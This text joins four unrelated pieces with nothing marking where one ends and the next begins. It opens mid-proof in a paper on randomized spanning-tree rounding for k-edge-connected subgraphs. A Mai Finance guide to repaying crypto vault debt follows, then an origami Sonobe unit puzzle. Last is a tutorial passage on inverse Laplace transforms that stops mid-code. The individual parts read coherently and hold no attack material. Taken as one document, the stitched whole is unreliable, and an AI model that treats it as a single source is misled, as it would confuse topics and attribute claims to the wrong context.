Fix spanning trees $T_1, \dots, T_{k/2}$ in $G'$ and let $D = \delta(S)$ for some $S \subseteq V'$, where $(u_0, v_0) \notin \delta(S)$. We show that $(T^* \uplus F)_D \ge k$. If $T^*_D > k - \alpha\sqrt{k}/2 - 1$, then $(T^* \uplus F)_D \ge k$ since $F$ has $\lceil \alpha\sqrt{k}/2 \rceil + 1$ copies of the minimum spanning tree, and we are done. Otherwise $T^*_D \le k - \alpha\sqrt{k}/2 - 1$. Then, we know that for any tree $T_i$, either $(T_i)_D \ge 2$ or $(T_i)_D = 1$. If $(T_i)_D = 1$, say $D \cap T_i = \{e\}$, then $D = C_{T_i}(e)$ and $C_{T_i}(e)_{T^*} \le k - \alpha\sqrt{k}/2 - 1$, so $F$ has one extra copy of the unique edge $e$ of $T_i$ in $D$. Therefore, including those cases where an extra copy of the edge is added, each $T_i$ contributes at least two edges to $D$, so $(T^* \uplus F)_D \ge 2 \cdot k/2 = k$ as desired. ∎
###### Lemma 3.2.
For any $\alpha \ge 0$, $i \in [k/2]$, and any $e \in E'$,
$$\mathbb{P}\Big[C_{T_i}(e)_{T^*} \le k - \alpha\sqrt{k}/2 - 1 \,\Big|\, e \in T_i \wedge (u_0, v_0) \notin C_{T_i}(e)\Big] \le e^{-\alpha^2/2},$$
where the randomness is over spanning trees $T_1, \dots, T_{k/2}$ independently sampled from $\mu_\lambda$.
###### Proof.
Condition on a tree $T_i$ such that $e \in T_i$ and $(u_0, v_0) \notin C_{T_i}(e)$.
By Lemma 2.5, for any $j$ such that $j \ne i$, $(T_j)_{C_{T_i}(e)}$ is a $\mathrm{BS}(q_j)$ random variable, with $q_j = \mathbb{E}\big[(T_j)_{C_{T_i}(e)}\big] \ge 2$. Also, by definition, $(T_i)_{C_{T_i}(e)} = 1$ (with probability 1). Since $T_1, \dots, T_{k/2}$ are independently chosen, by Fact 2.4 the random variable $X = \sum_{j \ne i} (T_j)_{C_{T_i}(e)}$ is distributed as $\mathrm{BS}(q)$ for $q = \sum_{j \ne i} q_j \ge k - 2$. Since each $T_j$ has at least one edge in $C_{T_i}(e)$, $X \ge k/2 - 1$ with probability 1. So, by Theorem 2.6, applied with $q' = k - 2$,
$$\mathbb{P}\Big[C_{T_i}(e)_{T^*} \le k - \alpha\sqrt{k}/2 - 1\Big] = \mathbb{P}\Big[X \le k - \alpha\sqrt{k}/2 - 2\Big] \le e^{-\alpha^2/2}.$$
Averaging over all realizations of $T_i$ satisfying the required conditions proves the lemma. ∎
###### Proof of Theorem 1.2.
Let $x$ be an optimum solution of LP (1). Since the output of the algorithm is always $k$-edge connected we just need to show $\mathbb{E}[c(T^* \uplus F)] \le \big(1 + \sqrt{8 \ln k / k}\big)\, c(x)$. By linearity of expectation,
$$\mathbb{E}[c(T^*)] = \sum_{i \in [k/2]} \mathbb{E}[c(T_i)] = \frac{k}{2} \sum_{e \in E} c(e)\, \mathbb{P}_{\mu_\lambda}[e \in T] = \frac{k}{2} \sum_{e \in E} c(e) \cdot \frac{2}{k} \cdot x_e = c(x),$$
where for simplicity we ignored the $(1 + 2^{-n})$ loss in the marginals. On the other hand, since by Fact 2.1 $\frac{2}{k} x$ is in the spanning tree polytope of $G'$, $c(\mathrm{MST}) \le \frac{2}{k} c(x)$. It remains to bound the expected cost of $F$. By Lemma 3.2, we have,
$$\mathbb{E}[c(F)] \le \Big(\big\lceil \alpha\sqrt{k}/2 \big\rceil + 1\Big)\, c(\mathrm{MST}) + \sum_{e \in E} c(e) \sum_{i=1}^{k/2} \mathbb{P}\big[e \in T_i \wedge (u_0, v_0) \notin C_{T_i}(e)\big]\, \mathbb{P}\Big[C_{T_i}(e)_{T^*} \le k - \alpha\sqrt{k}/2 - 1 \,\Big|\, e \in T_i \wedge (u_0, v_0) \notin C_{T_i}(e)\Big]$$
$$\le \Big(\frac{\alpha\sqrt{k}}{2} + 2\Big) \frac{2}{k}\, c(x) + e^{-\alpha^2/2} \sum_{e \in E} c(e) \cdot \frac{k}{2} \cdot \frac{2}{k}\, x_e \le \Big(\frac{\alpha}{\sqrt{k}} + \frac{4}{k} + e^{-\alpha^2/2}\Big)\, c(x).$$
Putting these together we get $\mathbb{E}[c(T^* \uplus F)] \le \big(1 + \frac{\alpha}{\sqrt{k}} + \frac{4}{k} + e^{-\alpha^2/2}\big)\, c(x)$. Setting $\alpha = 2\sqrt{2 \ln k}$ finishes the proof. ∎
Debt repayment - How?
This page will present different options to repay your debt on Mai Finance. Keep in mind that repaying a debt is never mandatory as long as you want to keep your loan, and don't need your collateral.
The market is on a bull run and your crypto, locked in the Vault, is gaining more and more value, so much that you decided to sell it. However, because it's in the Vault on Mai Finance, you can't totally unlock it unless you repay your loan.
The market is bearish, and your crypto is losing value very quickly. You don't generate yield fast enough to cover the damage and keep a healthy Collateral to Debt Ratio (CDR), and liquidation is near. It's time to repay your debt to make sure you're not losing too much, and to prevent liquidation.
If you are not in any of the above situations, it's probably not worth repaying your debt. Please see the chapter on Debt Repayment for more details.
# Partial or Full repayment using fiat
The most direct way to repay your debt is to use some fiat, especially if you want to keep your collateral and other investments untouched.
Mai Finance is partnering with Transak to easily bridge money bought by credit/debit cards or bank transfers directly to the Polygon network. Simply head to Mai Finance and click the Transak icon in the menu bar to open a modal that will let you purchase some MATIC and send it directly to your Polygon wallet.
Buying some USDC from fiat and bridging to Polygon directly
The main issue is the time taken to process the transaction. However, doing so will let you swap USDC for MAI and then partially or fully repay your debt.
# Repayment using the benefits of your loan
## Partial Repayment
Most people will want to borrow MAI on Mai Finance in order to invest in specific projects. Yield farmers that are using MAI will most probably be successful generating additional resources and will hopefully not lose money on degen farms. If that's your case, you have two options:
• repay your loan with the generated revenue
• re-invest your gains into the same (or another) project
In most cases, it's probably better to re-invest your gains. Indeed, by compounding your rewards, the APR (Annual Percentage Rate) is applied to a bigger amount, which in turn generates more revenue. See our investment guides to get ideas on how you can maximize your investments.
However, some people simply don't like the idea of having a debt, and will want to repay it as quickly as possible. If that's your case, you can simply swap your gains into MAI, and repay your debt.
• Select the Manage option
• Select the Repay tab at the bottom of your Vault
• Enter any amount you want to repay
• Click Repay MAI and you're done
Partially repaying a portion of my debt
As an example:
• You have $1,000.00 worth of camWMATIC in your vault, with a debt of $400.00
• You swapped $10.00 worth of ADDY tokens for MAI
• You repay $10.00 today
## Main idea
On Mai Finance, you can borrow MAI stable coins by depositing a certain amount of collateral in a vault. The collateral to debt ratio always needs to stay above a certain threshold, 150% for most vaults. This means, for a 150% CDR, that for every $100 worth of collateral, you can only borrow $66.67 of MAI.
However, this would directly put you in a liquidation position. This means that the health of your vault is considered too risky, and anyone can repay a portion of your debt using their funds and get paid back by getting a portion of your collateral. For more details about liquidation, please read the official documentation.
It's usually considered best practice to keep a high collateral to debt ratio to prevent liquidation, but even with a CDR close to 150%, it's easy to see that the value of the collateral is ALWAYS bigger than the value of the debt. This means that you can, in theory, repay your debt by selling some of your collateral asset.
## How to use collateral
Let's consider a vault with $1,000.00 worth of MATIC and a $500.00 debt. The CDR is 200%. The minimum CDR is 150%. In this example, we want to repay the debt completely, but we want to avoid liquidation, so we will try to never go below a 160% CDR when withdrawing our collateral. We will be using the following formulas:
$CDR=\frac{Collateral}{Debt}$
$AvailableCollateral = InitialCollateral - TargetCDR*Debt$
In this situation, if we want to keep a CDR of 160%, the amount of collateral we can withdraw "safely" is $1,000 − 160% × $500 = $200.
Hence, we will have to proceed in multiple steps:
• Withdraw $200 from the collateral
• The vault now has $800 worth of MATIC and $500 of debt; the CDR is 160%
• Sell the $200 worth of collateral to buy MAI
• Repay $200 of the debt with a 0.5% repayment fee
• The vault now has $799 worth of MATIC and $300 of debt; the CDR is 266.33%
• Calculate the new amount of collateral we can withdraw: $319
• Withdraw $319 from the collateral
• The vault now has $480 of MATIC and $300 of debt; the CDR is 160%
• Sell the $319 worth of collateral to buy MAI
• Repay $300 of the debt with a 0.5% repayment fee
• The vault has $478.50 worth of MATIC and $0 of debt, and you still have $19 of MAI
You can see that keeping a healthy CDR can greatly help you repay your debt with a very small number of loops. Of course, if your CDR is closer to the 150% limit, you may have to operate more loops since you cannot withdraw as much at once.
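The withdraw-sell-repay loop above can be sketched in Python. This is a simplified model (constant prices, 1:1 swaps with no slippage, the 0.5% repayment fee taken from the collateral); the function name and structure are illustrative, not Mai Finance code:

```python
def repay_with_collateral(collateral, debt, target_cdr=1.6, fee=0.005):
    """Repay a vault debt by looping: withdraw the safe amount of
    collateral (collateral - target_cdr * debt, per the formula above),
    sell it for MAI, and repay, paying a 0.5% repayment fee."""
    mai, loops = 0.0, 0
    while debt > 0:
        withdraw = collateral - target_cdr * debt  # AvailableCollateral formula
        if withdraw <= 0:
            raise ValueError("CDR at or below target; cannot withdraw safely")
        collateral -= withdraw
        mai += withdraw                # sell the withdrawn collateral for MAI
        repay = min(mai, debt)
        debt -= repay
        mai -= repay
        collateral -= repay * fee      # 0.5% repayment fee
        loops += 1
    return collateral, mai, loops

# The $1,000 MATIC / $500 debt example from above:
final_collateral, leftover_mai, loops = repay_with_collateral(1000.0, 500.0)
# → roughly $478.50 of collateral and $19 of MAI left after 2 loops
```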
A collateral to debt ratio of 260% is enough to be able to withdraw the total amount of your debt and stay above 160% CDR. This way, you only need one loop to fully repay your debt.
Note that fully repaying your debt by selling your collateral is never necessary if you don't need to sell your underlying assets, or to modify your CDR and keep your vault from being liquidated.
# Repayment using a robot
This paragraph is pure theory and is only for advanced programmers. The idea is to use flash loans to repay your debt and unlock the collateral so that it can be sold. Flash loans are an option proposed by some applications on different networks, including Polygon, that allow you to borrow funds and repay the loan within the same transaction block. If the loan cannot be fully repaid within the same block, the transaction is simply reverted. On Polygon, AAVE offers flash loans.
If we take the example above, with $1,000.00 worth of MATIC and a debt of $500.00, the flow would be as follows:
• Borrow $600.00 of USDC on AAVE in a flash loan
• Swap the USDC for MAI
• Repay your debt completely
• Withdraw your MATIC collateral
• Sell your MATIC for USDC
• Repay the AAVE flash loan

When submitted, this list of transactions will all happen in the same block, and you will end up with whatever is left from your MATIC as USDC in your wallet (more or less $500.00, with some slight variations due to the flash loan interest rate, swap fees, and repayment fees).
Right now, you would have to interact directly with the smart contracts, which requires a good understanding of how they work. If you need help, you can find some on our Discord server, where there's a programming channel. Maybe in the near future, FuruCombo will propose Mai Finance bricks that would allow you to operate this directly using their graphic tool, but for now it's not possible. Finally, the idea of a button to "repay debt using collateral" has been proposed to the Mai Finance dev team, and the option may be implemented in the future.
# Short term VS Long term Debt Repayments
Depending on your strategy and the way you feel about your debt, it may be a good idea to compare different lending platforms. However, keep in mind that Mai Finance, with its 0% interest and 0.5% repayment fee, is one of the top products on the Polygon market. The real competitor is AAVE, but only if you want to borrow MAI or USDC for a short period of time.
• Mai is 0% interest + 0.5% repayment fee
• AAVE has no repayment fees, but a variable APR for interests you need to pay back
Supplying and Borrowing APY on AAVE as of August 2021
As an example for USDC, you can see that the borrowing rate is 3.79%, with a current reward of 2.08% paid back in MATIC. This gives, at the moment of writing, the equivalent of a 1.71% rate you need to pay back if you keep your loan for a complete year. With AAVE, since you can repay your debt very quickly, the variable APY is equivalent to about 0.005% daily. Hence, it would take 100 days (a bit more than 3 months) to reach 0.5% of your debt.
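The break-even point in this comparison can be recomputed directly (the text rounds the daily rate to 0.005%, giving roughly 100 days; with the unrounded 1.71% figure it comes out slightly higher):

```python
mai_repayment_fee = 0.005            # Mai: one-time 0.5% repayment fee
aave_net_apr = 0.0379 - 0.0208       # AAVE: 3.79% borrow rate minus 2.08% rewards
daily_rate = aave_net_apr / 365      # ≈ 0.0047% per day

breakeven_days = mai_repayment_fee / daily_rate
# → about 107 days; beyond this, Mai's flat fee beats AAVE's accruing interest
```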
If you plan to keep your loan longer than that, it's definitely better to use Mai Finance. Also, it's important to understand that AAVE borrowing APRs are variable: they fluctuate with the amounts that are deposited and borrowed (the more people want to borrow from AAVE, the higher the borrowing APR). Also keep in mind that the MATIC reward program will end at some point, and the 1.71% effective interest will then become a 3.79% interest rate. At least with Mai Finance, you don't have to keep a close eye on your loan to see when it becomes dangerous to keep it.
Finally, the Mai Finance team is working on vault incentives that would work the same way as the MATIC reward, meaning that you would still get a 0% interest loan plus a bonus paid in Qi that may very well reduce the effective repayment fee to 0% of your debt. And the longer you keep your loan, the more rewards you will collect, making it a true negative interest loan.
# Disclaimer
The views, thoughts, and opinions expressed in the text belong solely to the author, and not necessarily to the rest of the community, nor the development team behind Mai Finance. It should not be taken as financial advice or guidance of any kind.
Keep in mind that a strategy that works well at a given time may perform poorly (or make you lose money) at another time. Please stay informed, monitor the markets, keep an eye on your investments, and as always, do your own research.
## Sonobe puzzler 2: How many units?
This is the second of three puzzlers for the Sonobe lover. The first is here; for partial background, see my earlier posts [1, 2, 3, gallery] on the Sonobe unit.
Consider the following origami construction. How many Sonobe units is it made of?
Keep reading for a few hints.
Hint #1: four of the corners have broken underlying geometry. (See the links at the top of this post to understand what this means.) In particular, the dark blue units have been folded perpendicular to their ribs, along their pockets, instead of vice-versa. Without this twist, the construction would look like a cube.
Hint #2: following Hint #1, let’s talk about cubes. There are several different ways to make a cube from Sonobe units:
In these images, the leftmost cube is made from six units; its underlying geometry is that of the tetrahedron. The second and third cubes from the left are made from twelve units each. In this case, the underlying geometry is actually that of a cube, and we use the flat square faces mentioned in the third image here. In the second cube, the units are “inside-out,” with the pockets on the interior of the cube and the ribs visible along the edges. In the third cube, they are “right-side out.” (If you try to make this yourself, which is not difficult, you’ll notice that this requires you to fold the “wrong way” along the rib.) In the rightmost cube, made from twenty-four units, the underlying geometry is that of a cuboctahedron.
The flat square faces and the faces of the triangular pyramids constructed on the equilateral triangular faces are coplanar.
The cube that underlies the mystery construction is the same size as the twenty-four unit cube just mentioned, but it’s easy to see that it’s constructed differently. In fact, it uses more than twenty-four units.
Hint #3: one can understand the geometry of this polyhedron via the A3 lattice, the tetrahedral-octahedral honeycomb, or the hyperplane arrangement consisting of the planes $\pm x \pm y \pm z = 1$ (or the larger arrangement $x \pm y \pm z \in 2\mathbb{Z} + 1$).
Paul's Online Notes
Home / Differential Equations / Laplace Transforms / Inverse Laplace Transforms
### Section 4-3 : Inverse Laplace Transforms
Finding the Laplace transform of a function is not terribly difficult if we’ve got a table of transforms in front of us to use as we saw in the last section. What we would like to do now is go the other way.
We are going to be given a transform, $$F(s)$$, and ask what function (or functions) did we have originally. As you will see this can be a more complicated and lengthy process than taking transforms. In these cases we say that we are finding the Inverse Laplace Transform of $$F(s)$$ and use the following notation.
$f\left( t \right) = {\mathcal{L}^{\, - 1}}\left\{ {F\left( s \right)} \right\}$
As with Laplace transforms, we’ve got the following fact to help us take the inverse transform.
#### Fact
Given the two Laplace transforms $$F(s)$$ and $$G(s)$$ then
${\mathcal{L}^{\, - 1}}\left\{ {aF\left( s \right) + bG\left( s \right)} \right\} = a{\mathcal{L}^{\, - 1}}\left\{ {F\left( s \right)} \right\} + b{\mathcal{L}^{\, - 1}}\left\{ {G\left( s \right)} \right\}$
for any constants $$a$$ and $$b$$.
So, we take the inverse transform of the individual transforms, put any constants back in and then add or subtract the results back up.
Let’s take a look at a couple of fairly simple inverse transforms.
Example 1 Find the inverse transform of each of the following.
1. $$\displaystyle F\left( s \right) = \frac{6}{s} - \frac{1}{{s - 8}} + \frac{4}{{s - 3}}$$
2. $$\displaystyle H\left( s \right) = \frac{{19}}{{s + 2}} - \frac{1}{{3s - 5}} + \frac{7}{{{s^5}}}$$
3. $$\displaystyle F\left( s \right) = \frac{{6s}}{{{s^2} + 25}} + \frac{3}{{{s^2} + 25}}$$
4. $$\displaystyle G\left( s \right) = \frac{8}{{3{s^2} + 12}} + \frac{3}{{{s^2} - 49}}$$
We’ve always felt that the key to doing inverse transforms is to look at the denominator and try to identify what you’ve got based on that. If there is only one entry in the table that has that particular denominator, the next step is to make sure the numerator is correctly set up for the inverse transform process. If it isn’t, correct it (this is always easy to do) and then take the inverse transform.
If there is more than one entry in the table that has a particular denominator, then the numerators of each will be different, so go up to the numerator and see which one you’ve got. If needed, correct the numerator to get it into the proper form and then take the inverse transform.
So, with this advice in mind let’s see if we can take some inverse transforms.
a $$\displaystyle F\left( s \right) = \frac{6}{s} - \frac{1}{{s - 8}} + \frac{4}{{s - 3}}$$
From the denominator of the first term it looks like the first term is just a constant. The correct numerator for this term is a “1” so we’ll just factor the 6 out before taking the inverse transform. The second term appears to be an exponential with $$a = 8$$ and the numerator is exactly what it needs to be. The third term also appears to be an exponential, only this time $$a = 3$$ and we’ll need to factor the 4 out before taking the inverse transforms.
So, with a little more detail than we’ll usually put into these,
\begin{align*}F\left( s \right) & = 6\,\frac{1}{s} - \frac{1}{{s - 8}} + 4\,\frac{1}{{s - 3}}\\ f\left( t \right) & = 6\left( 1 \right) - {{\bf{e}}^{8t}} + 4\left( {{{\bf{e}}^{3t}}} \right)\\ & = 6 - {{\bf{e}}^{8t}} + 4{{\bf{e}}^{3t}}\end{align*}
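If you have Python handy, the transform pair can be double-checked by transforming the claimed answer forward again (a quick SymPy sketch, not part of the table method itself):

```python
import sympy as sp

t = sp.symbols('t', positive=True)
s = sp.symbols('s')

# Claimed answer from part (a)
f = 6 - sp.exp(8*t) + 4*sp.exp(3*t)

# Transforming it forward should reproduce the original F(s)
F = sp.laplace_transform(f, t, s, noconds=True)
assert sp.simplify(F - (6/s - 1/(s - 8) + 4/(s - 3))) == 0
```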
b $$\displaystyle H\left( s \right) = \frac{{19}}{{s + 2}} - \frac{1}{{3s - 5}} + \frac{7}{{{s^5}}}$$
The first term in this case looks like an exponential with $$a = - 2$$ and we’ll need to factor out the 19. Be careful with negative signs in these problems, it’s very easy to lose track of them.
The second term almost looks like an exponential, except that it’s got a $$3s$$ instead of just an $$s$$ in the denominator. It is an exponential, but in this case, we’ll need to factor a 3 out of the denominator before taking the inverse transform.
The denominator of the third term appears to be #3 in the table with $$n = 4$$. The numerator however, is not correct for this. There is currently a 7 in the numerator and we need a $$4! = 24$$ in the numerator. This is very easy to fix. Whenever a numerator is off by a multiplicative constant, as in this case, all we need to do is put the constant that we need in the numerator. We will just need to remember to take it back out by dividing by the same constant.
So, let’s first rewrite the transform.
\begin{align*}H\left( s \right) & = \frac{{19}}{{s - \left( { - 2} \right)}} - \frac{1}{{3\left( {s - \frac{5}{3}} \right)}} + \frac{{7\frac{{4!}}{{4!}}}}{{{s^{4 + 1}}}}\\ & = 19\frac{1}{{s - \left( { - 2} \right)}} - \frac{1}{3}\frac{1}{{s - \frac{5}{3}}} + \frac{7}{{4!}}\frac{{4!}}{{{s^{4 + 1}}}}\end{align*}
So, what did we do here? We factored the 19 out of the first term. We factored the 3 out of the denominator of the second term since it can’t be there for the inverse transform and in the third term we factored everything out of the numerator except the 4! since that is the portion that we need in the numerator for the inverse transform process.
Let’s now take the inverse transform.
$h\left( t \right) = 19{{\bf{e}}^{ - 2t}} - \frac{1}{3}{{\bf{e}}^{\frac{{5t}}{3}}} + \frac{7}{{24}}{t^4}$
c $$\displaystyle F\left( s \right) = \frac{{6s}}{{{s^2} + 25}} + \frac{3}{{{s^2} + 25}}$$
In this part we’ve got the same denominator in both terms and our table tells us that we’ve either got #7 or #8. The numerators will tell us which we’ve actually got. The first one has an $$s$$ in the numerator and so this means that the first term must be #8 and we’ll need to factor the 6 out of the numerator in this case. The second term has only a constant in the numerator and so this term must be #7, however, in order for this to be exactly #7 we’ll need to multiply/divide a 5 in the numerator to get it correct for the table.
The transform becomes,
\begin{align*}F\left( s \right) & = 6\frac{s}{{{s^2} + {{\left( 5 \right)}^2}}} + \frac{{3\frac{5}{5}}}{{{s^2} + {{\left( 5 \right)}^2}}}\\ & = 6\frac{s}{{{s^2} + {{\left( 5 \right)}^2}}} + \frac{3}{5}\frac{5}{{{s^2} + {{\left( 5 \right)}^2}}}\end{align*}
Taking the inverse transform gives,
$f\left( t \right) = 6\cos \left( {5t} \right) + \frac{3}{5}\sin \left( {5t} \right)$
d $$\displaystyle G\left( s \right) = \frac{8}{{3{s^2} + 12}} + \frac{3}{{{s^2} - 49}}$$
In this case the first term will be a sine once we factor a 3 out of the denominator, while the second term appears to be a hyperbolic sine (#17). Again, be careful with the difference between these two. Both of the terms will also need to have their numerators fixed up. Here is the transform once we’re done rewriting it.
\begin{align*}G\left( s \right) & = \frac{1}{3}\frac{8}{{{s^2} + 4}} + \frac{3}{{{s^2} - 49}}\\ & = \frac{1}{3}\frac{{\left( 4 \right)\left( 2 \right)}}{{{s^2} + {{\left( 2 \right)}^2}}} + \frac{{3\frac{7}{7}}}{{{s^2} - {{\left( 7 \right)}^2}}}\end{align*}
Notice that in the first term we took advantage of the fact that we could get the 2 in the numerator that we needed by factoring the 8. The inverse transform is then,
$g\left( t \right) = \frac{4}{3}\sin \left( {2t} \right) + \frac{3}{7}\sinh \left( {7t} \right)$
So, probably the best way to identify the transform is by looking at the denominator. If there is more than one possibility use the numerator to identify the correct one. Fix up the numerator if needed to get it into the form needed for the inverse transform process. Finally, take the inverse transform.
Let’s do some slightly harder problems. These are a little more involved than the first set.
Example 2 Find the inverse transform of each of the following.
1. $$\displaystyle F\left( s \right) = \frac{{6s - 5}}{{{s^2} + 7}}$$
2. $$\displaystyle F\left( s \right) = \frac{{1 - 3s}}{{{s^2} + 8s + 21}}$$
3. $$\displaystyle G\left( s \right) = \frac{{3s - 2}}{{2{s^2} - 6s - 2}}$$
4. $$\displaystyle H\left( s \right) = \frac{{s + 7}}{{{s^2} - 3s - 10}}$$
a $$\displaystyle F\left( s \right) = \frac{{6s - 5}}{{{s^2} + 7}}$$
From the denominator of this one it appears that it is either a sine or a cosine. However, the numerator doesn’t match up to either of these in the table. A cosine wants just an $$s$$ in the numerator with at most a multiplicative constant, while a sine wants only a constant and no $$s$$ in the numerator.
We’ve got both in the numerator. This is easy to fix however. We will just split up the transform into two terms and then do inverse transforms.
\begin{align*}F\left( s \right) & = \frac{{6s}}{{{s^2} + 7}} - \frac{{5\frac{{\sqrt 7 }}{{\sqrt 7 }}}}{{{s^2} + 7}}\\ f\left( t \right) & = 6\cos \left( {\sqrt 7 t} \right) - \frac{5}{{\sqrt 7 }}\sin \left( {\sqrt 7 t} \right)\end{align*}
Do not get too used to always getting the perfect squares in sines and cosines that we saw in the first set of examples. More often than not (at least in my class) they won’t be perfect squares!
b $$\displaystyle F\left( s \right) = \frac{{1 - 3s}}{{{s^2} + 8s + 21}}$$
In this case there are no denominators in our table that look like this. We can however make the denominator look like one of the denominators in the table by completing the square on the denominator. So, let’s do that first.
\begin{align*}{s^2} + 8s + 21 & = {s^2} + 8s + 16 - 16 + 21\\ & = {s^2} + 8s + 16 + 5\\ & = {\left( {s + 4} \right)^2} + 5\end{align*}
Recall that in completing the square you take half the coefficient of the $$s$$, square this, and then add and subtract the result to the polynomial. After doing this the first three terms should factor as a perfect square.
So, the transform can be written as the following.
$F\left( s \right) = \frac{{1 - 3s}}{{{{\left( {s + 4} \right)}^2} + 5}}$
Okay, with this rewrite it looks like we’ve got #19 and/or #20’s from our table of transforms. However, note that in order for it to be a #19 we want just a constant in the numerator and in order to be a #20 we need an $$s – a$$ in the numerator. We’ve got neither of these, so we’ll have to correct the numerator to get it into proper form.
In correcting the numerator always get the $$s – a$$ first. This is the important part. We will also need to be careful of the 3 that sits in front of the $$s$$. One way to take care of this is to break the term into two pieces, factor the 3 out of the second and then fix up the numerator of this term. This will work; however, it will put three terms into our answer and there are really only two terms.
So, we will leave the transform as a single term and correct it as follows,
\begin{align*}F\left( s \right) & = \frac{{1 - 3\left( {s + 4 - 4} \right)}}{{{{\left( {s + 4} \right)}^2} + 5}}\\ & = \frac{{1 - 3\left( {s + 4} \right) + 12}}{{{{\left( {s + 4} \right)}^2} + 5}}\\ & = \frac{{ - 3\left( {s + 4} \right) + 13}}{{{{\left( {s + 4} \right)}^2} + 5}}\end{align*}
We needed an $$s + 4$$ in the numerator, so we put that in. We just needed to make sure and take the 4 back out by subtracting it back out. Also, because of the 3 multiplying the $$s$$ we needed to do all this inside a set of parenthesis. Then we partially multiplied the 3 through the second term and combined the constants. With the transform in this form, we can break it up into two transforms each of which are in the tables and so we can do inverse transforms on them,
\begin{align*}F\left( s \right) & = - 3\frac{{s + 4}}{{{{\left( {s + 4} \right)}^2} + 5}} + \frac{{13\frac{{\sqrt 5 }}{{\sqrt 5 }}}}{{{{\left( {s + 4} \right)}^2} + 5}}\\ f\left( t \right) & = - 3{{\bf{e}}^{ - 4t}}\cos \left( {\sqrt 5 t} \right) + \frac{{13}}{{\sqrt 5 }}{{\bf{e}}^{ - 4t}}\sin \left( {\sqrt 5 t} \right)\end{align*}
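Completing the square is easy to get wrong, so it is worth verifying the claimed answer by transforming it forward again (a SymPy sketch, not part of the original notes):

```python
import sympy as sp

t = sp.symbols('t', positive=True)
s = sp.symbols('s')

# Claimed answer from part (b)
f = (-3*sp.cos(sp.sqrt(5)*t) + 13/sp.sqrt(5)*sp.sin(sp.sqrt(5)*t)) * sp.exp(-4*t)

# The forward transform should reproduce the original F(s)
F = sp.laplace_transform(f, t, s, noconds=True)
assert sp.simplify(F - (1 - 3*s)/(s**2 + 8*s + 21)) == 0
```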
c $$\displaystyle G\left( s \right) = \frac{{3s - 2}}{{2{s^2} - 6s - 2}}$$
This one is similar to the last one. We just need to be careful with completing the square, however. The first thing that we should do is factor a 2 out of the denominator, then complete the square. Remember that when completing the square a coefficient of 1 on the $$s^{2}$$ term is needed! So, here’s the work for this transform.
\begin{align*}G\left( s \right) & = \frac{{3s - 2}}{{2\left( {{s^2} - 3s - 1} \right)}}\\ & = \frac{1}{2}\frac{{3s - 2}}{{{s^2} - 3s + \frac{9}{4} - \frac{9}{4} - 1}}\\ & = \frac{1}{2}\frac{{3s - 2}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}\end{align*}
So, it looks like we’ve got #21 and #22 with a corrected numerator. Here’s the work for that and the inverse transform.
\begin{align*}G\left( s \right) & = \frac{1}{2}\frac{{3\left( {s - \frac{3}{2} + \frac{3}{2}} \right) - 2}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}\\ & = \frac{1}{2}\frac{{3\left( {s - \frac{3}{2}} \right) + \frac{5}{2}}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}\\ & = \frac{1}{2}\left( {\frac{{3\left( {s - \frac{3}{2}} \right)}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}} + \frac{{\frac{5}{2}\frac{{\sqrt {13} }}{{\sqrt {13} }}}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}} \right)\\ g\left( t \right) & = \frac{1}{2}\left( {3{{\bf{e}}^{\frac{{3\,t}}{2}}}\cosh \left( {\frac{{\sqrt {13} }}{2}t} \right) + \frac{5}{{\sqrt {13} }}{{\bf{e}}^{\frac{{3\,t}}{2}}}\sinh \left( {\frac{{\sqrt {13} }}{2}t} \right)} \right)\end{align*}
In correcting the numerator of the second term, notice that I only put in the square root since we already had the “over 2” part of the fraction that we needed in the numerator.
d $$\displaystyle H\left( s \right) = \frac{{s + 7}}{{{s^2} - 3s - 10}}$$
This one appears to be similar to the previous two, but it actually isn’t. The denominators in the previous two couldn’t be easily factored. In this case the denominator does factor and so we need to deal with it differently. Here is the transform with the factored denominator.
$H\left( s \right) = \frac{{s + 7}}{{\left( {s + 2} \right)\left( {s - 5} \right)}}$
The denominator of this transform seems to suggest that we’ve got a couple of exponentials, however in order to be exponentials there can only be a single term in the denominator and no $$s$$’s in the numerator.
To fix this we will need to do partial fractions on this transform. In this case the partial fraction decomposition will be
$H\left( s \right) = \frac{A}{{s + 2}} + \frac{B}{{s - 5}}$
Don’t remember how to do partial fractions? In this example we’ll show you one way of getting the values of the constants and after this example we’ll review how to get the correct form of the partial fraction decomposition.
Okay, so let’s get the constants. There is a method for finding the constants that will always work, however it can lead to more work than is sometimes required. Eventually, we will need that method, however in this case there is an easier way to find the constants.
Regardless of the method used, the first step is to actually add the two terms back up. This gives the following.
$\frac{{s + 7}}{{\left( {s + 2} \right)\left( {s - 5} \right)}} = \frac{{A\left( {s - 5} \right) + B\left( {s + 2} \right)}}{{\left( {s + 2} \right)\left( {s - 5} \right)}}$
Now, this needs to be true for any $$s$$ that we should choose to put in. So, since the denominators are the same we just need to get the numerators equal. Therefore, set the numerators equal.
$s + 7 = A\left( {s - 5} \right) + B\left( {s + 2} \right)$
Again, this must be true for ANY value of $$s$$ that we want to put in. So, let’s take advantage of that. If it must be true for any value of $$s$$ then it must be true for $$s = - 2$$ — a convenient choice, since it makes the $$B$$ term vanish. In this case we get,
$5 = A\left( { - 7} \right) + B\left( 0 \right)\hspace{0.25in} \Rightarrow \hspace{0.25in} A = - \frac{5}{7}$
We found $$A$$ by appropriately picking $$s$$. We can find $$B$$ in the same way if we choose $$s = 5$$.
$12 = A\left( 0 \right) + B\left( 7 \right)\hspace{0.25in} \Rightarrow \hspace{0.25in}B = \frac{{12}}{7}$
This will not always work, but when it does it will usually simplify the work considerably.
So, with these constants the transform becomes,
$H\left( s \right) = \frac{{ - \frac{5}{7}}}{{s + 2}} + \frac{{\frac{{12}}{7}}}{{s - 5}}$
We can now easily do the inverse transform to get,
$h\left( t \right) = - \frac{5}{7}{{\bf{e}}^{ - 2t}} + \frac{{12}}{7}{{\bf{e}}^{5t}}$
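The constants found by picking convenient values of $$s$$ are exactly the residues of the transform at its poles, and the decomposition can be reproduced with SymPy (a sketch, not part of the original notes):

```python
import sympy as sp

s = sp.symbols('s')
H = (s + 7)/((s + 2)*(s - 5))

# "Cover up" a factor and evaluate at its root -- the same trick as above
A = sp.limit((s + 2)*H, s, -2)
B = sp.limit((s - 5)*H, s, 5)
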